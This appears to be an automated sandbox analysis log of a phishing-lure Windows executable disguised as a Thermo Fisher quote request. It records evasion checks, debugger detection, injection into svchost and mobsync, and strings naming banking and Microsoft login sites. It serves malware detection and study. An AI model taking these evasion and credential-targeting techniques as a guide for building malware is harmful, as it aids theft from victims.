                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00668111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00668111
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0061EB42
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0062123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0062123A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeAPI/Special instruction interceptor: Address: D4D24C
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\mobsync.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2038347719.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2037922445.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000002.2063515481.0000000000CED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeEvaded block: after key decisiongraph_0-93463
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94275
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\mobsync.exeAPI coverage: 2.4 %
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2664Thread sleep count: 46 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exe TID: 2664Thread sleep time: -92000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe TID: 5296Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe TID: 5296Thread sleep time: -40500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\mobsync.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00646CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00646CA9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006460DD
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006463F9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0064EB60
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064F56F FindFirstFileW,FindClose,0_2_0064F56F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0064F5FA
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00651B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00651B2F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00651C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00651C8A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00651F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00651F94
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0015C560 FindFirstFileW,FindNextFileW,FindClose,5_2_0015C560
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0061DDC0
                Source: 10O4645j.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 10O4645j.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 10O4645j.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 10O4645j.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 10O4645j.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 10O4645j.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 10O4645j.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 10O4645j.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 10O4645j.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 10O4645j.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 10O4645j.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 10O4645j.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 10O4645j.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 10O4645j.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 10O4645j.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: firefox.exe, 00000007.00000002.2572487810.0000026BB8DDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlljj3AP
                Source: 10O4645j.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 10O4645j.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 10O4645j.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: uxnRAYhIPZRPiA.exe, 00000006.00000002.3903292682.0000000000FFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E rdtsc 2_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417543 LdrLoadDll,2_2_00417543
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00656AAF BlockInput,0_2_00656AAF
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00603D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603D19
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00633920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00633920
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061E01E LoadLibraryA,GetProcAddress,0_2_0061E01E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00D4D4B8 mov eax, dword ptr fs:[00000030h]0_2_00D4D4B8
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00D4D518 mov eax, dword ptr fs:[00000030h]0_2_00D4D518
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00D4BE38 mov eax, dword ptr fs:[00000030h]0_2_00D4BE38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h]2_2_03B28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h]2_2_03B2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h]2_2_03B5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h]2_2_03B663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h]2_2_03B403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h]2_2_03BDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h]2_2_03BD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h]2_2_03BEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03B3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h]2_2_03B383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h]2_2_03BB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h]2_2_03B2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h]2_2_03B50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h]2_2_03B6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h]2_2_03BD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h]2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h]2_2_03BB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h]2_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h]2_2_03BD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h]2_2_03BB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h]2_2_03B402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h]2_2_03BC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h]2_2_03B6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h]2_2_03BB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
